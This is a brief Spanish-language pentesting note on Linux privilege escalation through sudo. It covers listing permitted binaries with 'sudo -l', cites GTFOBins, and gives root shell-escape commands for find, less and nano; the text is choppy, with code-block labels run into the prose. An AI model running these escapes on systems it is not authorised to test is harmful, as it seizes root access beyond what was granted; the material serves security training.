Sudo
Si al realizar un
bash
sudo -lVemos que tenemos permiso de ejecutar varios binarios, una web la cual es muy util en estos casos de gftobins
{% embed url="https://gtfobins.github.io" %}
Explotación de binarios
find
shell
sudo find . -exec /bin/sh \; -quitless
sudo less /etc/profile
!/bin/shnano
shell
sudo nano
^R^X
reset; sh 1>&0 2>&0